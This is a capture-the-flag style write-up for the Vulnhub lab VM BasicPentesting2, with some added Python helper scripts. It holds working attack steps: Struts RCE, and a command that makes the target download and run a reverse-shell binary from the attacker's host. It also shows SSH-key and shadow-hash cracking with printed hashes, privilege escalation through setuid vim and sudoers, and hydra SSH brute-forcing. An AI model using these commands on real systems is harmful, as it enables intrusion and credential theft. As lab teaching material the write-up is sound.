Vulnhub Writeup : BasicPentesting2

Box Stats :

Box Information : Details
Box Name      : BasicPentesting2
Series        : Basic Pentesting
Release Date  : 10 Jul 2018
Author        : Josiah Pierce
Difficulty    : Medium
Download Link : Link

Network Scan

The IP of the target VM is 192.168.56.103; the attacker machine is 192.168.56.1 on the same host-only network.

$ nmap -sV 192.168.56.103 -oN nmap.scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-12 18:03 UTC
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

Some interesting findings are:

  • OpenSSH 7.2p2 on port 22
  • Apache httpd 2.4.18 on port 80
  • Samba (3.X - 4.X) on ports 139/445
  • Apache Tomcat 9.0.7 on port 8080, with its AJP connector on port 8009

Now open the web page in a browser.

There is nothing special on it: just a small placeholder index.html (158 bytes, as the dirb scan below also reports).

Web Server Reconnaissance

Directory Bruteforce

Scan the web server for hidden URLs, directories or paths with dirb.

$ dirb http://192.168.56.103/ -o dirb.scan

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb.scan
START_TIME: Sun Jan 12 18:17:14 2020
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.103/ ----
==> DIRECTORY: http://192.168.56.103/development/
+ http://192.168.56.103/index.html (CODE:200|SIZE:158)
+ http://192.168.56.103/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.56.103/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Jan 12 18:17:15 2020
DOWNLOADED: 4612 - FOUND: 2

As we can see there is a development directory, and it has directory listing enabled, so let's open it.

There are two text files:

  • dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

  • j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
-K

These look like notes the two admins leave for each other. The first one says that the Apache Struts REST showcase example, version 2.5.12, is hosted on this server. Struts is a Java web framework, so that application almost certainly lives on the Tomcat instance nmap found on port 8080. Struts 2.5.12 is vulnerable to CVE-2017-9805, an unauthenticated remote code execution bug in the REST plugin's XStream deserialization handler, which is exactly what the exploit-db entry below targets. For more details about the vulnerability visit the linked post; it also explains how to test for it, so just follow its instructions.

Download exploit from here : https://www.exploit-db.com/exploits/42627

First start an HTTP server on the attacker machine (192.168.56.1) so a callback from the target can be observed; here PHP's built-in web server is used on port 1234:

 php -S 192.168.56.1:1234
 PHP 7.2.24-0ubuntu0.18.04.1 Development Server started at Fri Dec 27 18:31:57 2019
 Listening on http://192.168.56.1:1234
 Document root is /home/ajay
 Press Ctrl-C to quit.

Now run the exploit, telling the target to fetch a marker URL from our server:

 $ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 \
           "wget http://192.168.56.1:1234/Vulnerable"

The PHP server immediately logs a GET for /Vulnerable from 192.168.56.103: the Struts application ran our wget, so we have remote code execution on the target. The exploit does not return the command's output, which is why an out-of-band callback like this is the cleanest proof of execution.

Getting Reverse Shell

Generate a Linux x64 reverse TCP shell as an ELF binary with msfvenom:

$ msfvenom -p linux/x64/shell_reverse_tcp -f elf LHOST=192.168.56.1 LPORT=1234 -o rev_shell

Start a netcat listener on port 1234:

$ nc -lvvp 1234

Host the rev_shell binary on our local web server. Port 1234 is now taken by the netcat listener, so the web server has to listen on a different port; the exploit command below fetches the file from port 8080:

http://192.168.56.1:8080/rev_shell

The idea is to trigger the Struts RCE again, this time making the target download the binary, mark it executable and run it. The binary connects back to our listener and we get a reverse shell on the target. The addresses are:

Target URL:

http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3

Backdoor file location:

http://192.168.56.1:8080/rev_shell

Command to execute on the target (/tmp is used because it is world-writable):

cd /tmp/;wget http://192.168.56.1:8080/rev_shell;chmod +x rev_shell;./rev_shell

Running the exploit:

 $ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 \
       "cd /tmp/;wget http://192.168.56.1:8080/rev_shell;chmod +x rev_shell;./rev_shell"

and the netcat listener receives a connection: a shell running as tomcat9, the account Tomcat runs under.

Upgrade it to a proper TTY with Python's pty module (needed later for ssh's passphrase prompt and for vim):

python -c 'import pty;pty.spawn("/bin/bash")'
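Both steps above, the wget callback that proved code execution and the web server that hands out rev_shell, need the same thing on the attacker side: an HTTP server that records who asked for what. The following is an added example, not code from the writeup and not exploit-db 42627; it binds to 127.0.0.1 on an ephemeral port and serves a placeholder byte string instead of a real ELF (both assumptions so that it runs offline), and demo() plays the part of the target.

```python
"""Added example (not from the original writeup, not exploit-db 42627):
an attacker-side HTTP server that records every request it receives, so an
out-of-band callback such as `wget http://192.168.56.1:1234/Vulnerable` can
be confirmed programmatically, and that also serves a payload file such as
rev_shell. 127.0.0.1, port 0 (ephemeral) and the placeholder payload bytes
are assumptions made so the demo runs offline."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class CallbackHandler(BaseHTTPRequestHandler):
    files = {}   # url path -> bytes to serve, e.g. {"/rev_shell": elf_bytes}
    hits = []    # (client_ip, path) for every GET, served or not

    def do_GET(self):
        CallbackHandler.hits.append((self.client_address[0], self.path))
        body = CallbackHandler.files.get(self.path)
        if body is None:
            # Unknown path: still logged. The request itself is the evidence
            # that the injected command ran on the target.
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # keep stdout quiet; hits[] is the log we care about


def start_server(bind="127.0.0.1", port=0):
    """Serve in a background thread; server.server_address holds the real port."""
    srv = ThreadingHTTPServer((bind, port), CallbackHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def got_callback(marker, from_ip=None):
    """True once some client (optionally a specific IP) requested `marker`."""
    return any(p == marker and (from_ip is None or ip == from_ip)
               for ip, p in CallbackHandler.hits)


def demo():
    """Stand-in for the target: one request for the marker URL (what the
    injected wget does) and one download of the hosted payload."""
    CallbackHandler.files = {"/rev_shell": b"\x7fELF placeholder, constructed"}
    CallbackHandler.hits.clear()
    srv = start_server()
    host, port = srv.server_address
    base = f"http://{host}:{port}"
    try:
        urllib.request.urlopen(base + "/Vulnerable", timeout=5)
    except urllib.error.HTTPError:
        pass  # 404 is expected for the marker; the hit is what matters
    fetched = urllib.request.urlopen(base + "/rev_shell", timeout=5).read()
    srv.shutdown()
    srv.server_close()
    return {
        "callback_seen": got_callback("/Vulnerable", from_ip="127.0.0.1"),
        "payload_delivered": fetched == CallbackHandler.files["/rev_shell"],
        "hits": list(CallbackHandler.hits),
    }


if __name__ == "__main__":
    print(demo())
```

In a real engagement you would bind to the attacker's LAN address, pass from_ip=target to got_callback so a stray scanner cannot produce a false positive, and load rev_shell from disk into files. Keeping the marker path unique per command lets one server confirm several injected commands independently.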

Privilege Escalation

Method 1

Let's look at /home to see which users exist on the system.

tomcat9@basic2:/home$ ls
 
jan  kay

There are two users, "jan" and "kay". Let's check jan's folder first.

tomcat9@basic2:/home$ cd jan
tomcat9@basic2:/home/jan$ ls -al

total 16
drwxr-xr-x 2 root root 4096 Nov 29 16:55 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
-rw------- 1 root jan   602 Nov 29 16:55 .viminfo

Nothing interesting here: the only dotfiles are owned by root with mode 600, so we cannot read them. Now check kay's directory:

$ ls -al

total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   937 Jan 13 23:52 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Nov 29 17:05 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak

There is a .ssh directory, and because it is world-readable (drwxr-xr-x) we can list it. Inside is kay's SSH key pair plus authorized_keys, and the private key id_rsa turns out to be readable by our tomcat9 user. With it we should be able to log in as kay.

$ ls
 
authorized_keys  id_rsa  id_rsa.pub

But first we need the key's passphrase. Copy id_rsa to the attacker machine and convert it into a hash John the Ripper can load with ssh2john.py (it ships with the John jumbo distribution and can also be fetched here: Download Link).

$ python ssh2john.py id_rsa  > rsa_key.dat

$ john rsa_key.dat

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:44  3/3 0g/s 3137Kp/s 3137Kc/s 3137KC/s nl1nt..nl1sj
0g 0:00:00:46  3/3 0g/s 3178Kp/s 3178Kc/s 3178KC/s mdgblk..mdgbjn
0g 0:00:01:03  3/3 0g/s 3409Kp/s 3409Kc/s 3409KC/s rymagns..rymagls
0g 0:00:01:04  3/3 0g/s 3420Kp/s 3420Kc/s 3420KC/s 3gsimg..3gsigs
0g 0:00:01:08  3/3 0g/s 3461Kp/s 3461Kc/s 3461KC/s ff68br3..ff68bck
beeswax          (id_rsa_key)

The passphrase is "beeswax". We can use the key straight from the reverse shell: ssh only rejects a private key with loose permissions when the file is owned by the calling user, and this one belongs to kay, so tomcat9 can use it as it is. Log in to localhost as kay with id_rsa and the passphrase "beeswax" (the "Could not create directory" warnings just mean tomcat9 has no writable home directory):

$ ssh -i id_rsa kay@localhost    

Could not create directory '/home/tomcat9/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/home/tomcat9/.ssh/known_hosts).
Enter passphrase for key 'id_rsa': beeswax

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Jan 13 23:44:21 2020 from ::1
kay@basic2:~$ 

kay's home directory also holds pass.bak, which is owned by kay with mode 600 and was therefore unreadable from the tomcat9 shell. Now we can read it:

$ ls
pass.bak
$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

This looks like kay's own password (a backup, given the name). Her home directory also contains .sudo_as_admin_successful, which Ubuntu creates the first time a member of the sudo group uses sudo, so she is almost certainly allowed to sudo. Let's try it:

$ sudo -i
[sudo] password for kay: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
 
root@basic2:~# 

Yep, we have a root shell.

$ ls

flag.txt
root@basic2:~# cat flag.txt

Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.

Happy hacking!
root@basic2:~# 

And that's it: flag.txt in root's home directory confirms the box is done.

Method 2

Finding SUID root binaries: look for executables owned by root with the setuid bit set (-perm -4000). Such a binary runs with root's effective UID whoever launches it, so any entry that is not part of a stock install deserves a close look.

$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null

-rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 428240 Jan 18  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 2437320 Nov 24  2016 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 May 16  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Nov 30  2017 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30  2017 /bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
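Spotting the odd one out in a listing like this is the step that matters, and it is easier to do by diffing against a baseline than by eye. The following is an added example, not part of the writeup: it parses an excerpt of the find output above, reports root-owned setuid binaries missing from a baseline, and also checks the "other" execute bit, since find lists binaries that an unprivileged user cannot actually run. BASELINE stands in for a list captured from a clean Ubuntu 16.04 install and KNOWN_SHELL_ESCAPES is a small hand-picked set; both are assumptions for the demo.

```python
"""Added example (not from the writeup): triage a `find / -perm -4000` listing
by diffing it against a baseline and checking who can actually run each
binary. SUID_LISTING is an excerpt of the output above; BASELINE stands in for
a list captured from a clean Ubuntu 16.04 install and KNOWN_SHELL_ESCAPES is a
small hand-picked set. Both of those are assumptions for the demo."""
import os

SUID_LISTING = """\
-rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 2437320 Nov 24  2016 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
"""

# Assumed baseline: what a stock install is expected to carry (vim is not on it).
BASELINE = {
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic", "/usr/lib/snapd/snap-confine",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/bin/pkexec",
    "/usr/bin/sudo", "/usr/bin/passwd", "/bin/su", "/bin/ping",
}

# Programs that can read/write arbitrary files or run commands when setuid.
KNOWN_SHELL_ESCAPES = {"vim", "vim.basic", "vi", "nano", "less", "more", "find", "awk"}


def parse_find_listing(text):
    """Turn `ls -ld` lines into dicts; the path is everything after the date."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) != 9 or not parts[0].startswith("-"):
            continue
        mode, owner, path = parts[0], parts[2], parts[8]
        entries.append({
            "path": path,
            "owner": owner,
            "setuid": mode[3] == "s",       # user-execute slot shows 's'
            "setgid": mode[6] == "s",       # group-execute slot shows 's'
            "others_exec": mode[9] == "x",  # can a user outside the group run it?
        })
    return entries


def unexpected_suid(entries, baseline=BASELINE):
    """Root-owned setuid binaries that are not in the baseline."""
    return sorted(e["path"] for e in entries
                  if e["setuid"] and e["owner"] == "root" and e["path"] not in baseline)


def runnable_escapes(entries):
    """Setuid binaries we can execute whose name is a known file/shell escape."""
    return sorted(e["path"] for e in entries
                  if e["setuid"] and e["others_exec"]
                  and os.path.basename(e["path"]) in KNOWN_SHELL_ESCAPES)


def not_runnable_by_others(entries):
    """Listed by find, but a user outside the owning group cannot execute them."""
    return [e["path"] for e in entries if not e["others_exec"]]


if __name__ == "__main__":
    found = parse_find_listing(SUID_LISTING)
    print("unexpected:", unexpected_suid(found))
    print("escapes:", runnable_escapes(found))
    print("not runnable by us:", not_runnable_by_others(found))
```

On a real target, capture the baseline from a clean VM of the same release, pipe the live find output into parse_find_listing, and treat both lists as leads rather than verdicts: a binary in the baseline can still be exploitable if it is an old version, and a binary outside it may be a legitimate local package.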

vim.basic, the binary behind /usr/bin/vim on Ubuntu, is setuid root, which is not a stock setting: it lets us open and save any file as root. First we use it to read /etc/shadow so we can crack user passwords with john.

$ vim /etc/shadow

Editing in vim over a raw reverse shell is cumbersome because the screen does not redraw properly; press Return until the usernames become visible. Parts of the display will be missing, so rather than copying from the screen, save the buffer to a new file from vim's command mode with :w /home/code.hash and read that file normally. We are only interested in cracking two accounts:

kay:$6$ON8Wi9Ow$Puwzhgbc2chaNEqWFO/UVH2yJ5zVb3WirwtCxQ5ssr2OEMAuYCrHscUNe.KPUhH6ND4CYx9WWu449W3mrzVtk/:17644:0:99999:7:::
jan:$6$Bbz6m7oU$WjYF4ZiF/QuPuiNAzl7bthT8LvIWikymEtX6tZ0WplHQUmMezufOCrKQRdxqbP8j03.x.pXv04xDgexxwbIIG0:17640:0:99999:7:::
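Reading a shadow line correctly is the first step of any cracking attempt: the second field carries the crypt(3) algorithm id, the salt and the digest, and the third field is the day of the last password change. The following is an added example, not part of the writeup: it parses the two lines above (and a constructed locked root line), reports the algorithm john will need and when each password was last set, and rebuilds the passwd+shadow merge that john's unshadow produces. The passwd lines are constructed for the demo.

```python
"""Added example (not from the original writeup): parse /etc/shadow entries
the way a cracker reads them (algorithm id, salt, digest, ageing fields) and
build the passwd+shadow merge that john's `unshadow` produces. The kay/jan
hashes are the ones from the writeup; the root line and PASSWD_SAMPLE are
constructed for the demo."""
import datetime

# crypt(3) algorithm identifiers found between the first two '$' of a hash.
HASH_ALGOS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}

SHADOW_SAMPLE = """\
root:*:17640:0:99999:7:::
kay:$6$ON8Wi9Ow$Puwzhgbc2chaNEqWFO/UVH2yJ5zVb3WirwtCxQ5ssr2OEMAuYCrHscUNe.KPUhH6ND4CYx9WWu449W3mrzVtk/:17644:0:99999:7:::
jan:$6$Bbz6m7oU$WjYF4ZiF/QuPuiNAzl7bthT8LvIWikymEtX6tZ0WplHQUmMezufOCrKQRdxqbP8j03.x.pXv04xDgexxwbIIG0:17640:0:99999:7:::
"""

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
kay:x:1000:1000:kay,,,:/home/kay:/bin/bash
jan:x:1001:1001:jan,,,:/home/jan:/bin/bash
"""

EPOCH = datetime.date(1970, 1, 1)


def parse_shadow_line(line):
    """Split one shadow entry; works for the $id$salt$digest layout of md5/sha crypt."""
    f = line.rstrip("\n").split(":")
    if len(f) != 9:
        raise ValueError(f"expected 9 fields, got {len(f)}: {line!r}")
    user, pw, lastchg = f[0], f[1], f[2]
    entry = {
        "user": user, "hash": pw, "algo": None, "salt": None, "crackable": False,
        # field 3 is the day of the last password change, in days since the epoch
        "last_change": EPOCH + datetime.timedelta(days=int(lastchg)) if lastchg else None,
    }
    if pw.startswith("$"):
        _, algo_id, salt, _digest = pw.split("$", 3)
        entry["algo"] = HASH_ALGOS.get(algo_id, f"unknown(${algo_id}$)")
        entry["salt"] = salt
        entry["crackable"] = True
    # "*", "!", "!!" or an empty field mean locked / no password: nothing to crack
    return entry


def shadow_report(text):
    return [parse_shadow_line(l) for l in text.splitlines() if l.strip()]


def unshadow(passwd_text, shadow_text):
    """Merge like john's `unshadow`: passwd line with the real hash in field 2.
    Accounts whose shadow field holds no hash are dropped (nothing to crack)."""
    by_user = {e["user"]: e for e in shadow_report(shadow_text)}
    merged = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        e = by_user.get(f[0])
        if e and e["crackable"]:
            f[1] = e["hash"]
            merged.append(":".join(f))
    return merged


if __name__ == "__main__":
    for e in shadow_report(SHADOW_SAMPLE):
        print(f'{e["user"]:5} {e["algo"] or "locked":12} salt={e["salt"]} '
              f'changed={e["last_change"]}')
    print("\n".join(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)))
```

Two things the fields tell us before cracking starts: both hashes are sha512crypt, which is why john's output says "sha512crypt" with the default 5000 rounds, and the last-change days decode to 2018-04-19 for jan and 2018-04-23 for kay, which line up with the dates in dev.txt and j.txt (kay changed hers the day she wrote the note; jan never did).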

Copy those two lines to the attacker machine (saved here as shadow.dat; john accepts bare shadow lines as well as unshadowed passwd lines) and crack them with john:

$ john shadow.dat
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
armando          (jan)

John recovers jan's password, armando, from its default wordlist; kay's hash does not crack, which matches the note in j.txt that her password follows the policy. Now switch to jan:

$ su - jan
 
Password: armando
 
jan@basic2:~$ 

Editing /etc/sudoers: since the SUID vim runs as root, we can grant jan full sudo rights by adding the following line to /etc/sudoers:

jan ALL=(ALL:ALL) ALL

Open the file with vim and add that line. Note that this bypasses visudo, which would lock the file and check its syntax; a typo in sudoers breaks sudo for every user on the box, so type the line carefully and re-read it before saving.

$ vim /etc/sudoers

Move the cursor down with Return, press i to insert the line, then Esc followed by :wq! to force-write the read-only file and quit. After the edit, sudo lists the new rule for jan:

$ sudo -l
 
[sudo] password for jan: armando
 
Matching Defaults entries for jan on basic2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User jan may run the following commands on basic2:
     (ALL : ALL) ALL

Now getting a root shell

$ sudo su -
 
root@basic2:~# ls
ls
flag.txt
 
root@basic2:~# 

Getting a Shell : Method 2

Enumeration with enum4linux: enum4linux is a tool for enumerating information from Windows and Samba hosts. It is written in Perl and is essentially a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup. Here it is run against the Samba service nmap found on ports 139/445.

$ enum4linux 192.168.56.103

It produces a very long result; the important part is the user enumeration over the Unix user SID, which works with a null (empty) session:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Bruteforcing SSH: with valid usernames in hand we can brute-force SSH passwords with hydra. Note the warning hydra prints: the target's sshd limits parallel sessions, so -t 4 is the safer setting. At roughly 70 to 110 tries per minute a full rockyou run would take months, but jan's password is a plain dictionary word and falls after about ten minutes:

$ hydra -l jan -P rockyou.txt 192.168.56.103 -t 10 ssh -o success

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-14 07:21:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344289 to do in 2173:23h, 10 active
[STATUS] 86.67 tries/min, 260 tries in 00:03h, 14344139 to do in 2758:30h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343889 to do in 3281:17h, 10 active
[22][ssh] host: 192.168.56.103   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-14 07:32:10

jan's password is "armando", and it works over SSH as well:

$ ssh jan@192.168.56.103
jan@192.168.56.103's password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Fri Nov 29 16:53:56 2019 from 192.168.56.1
jan@basic2:~$
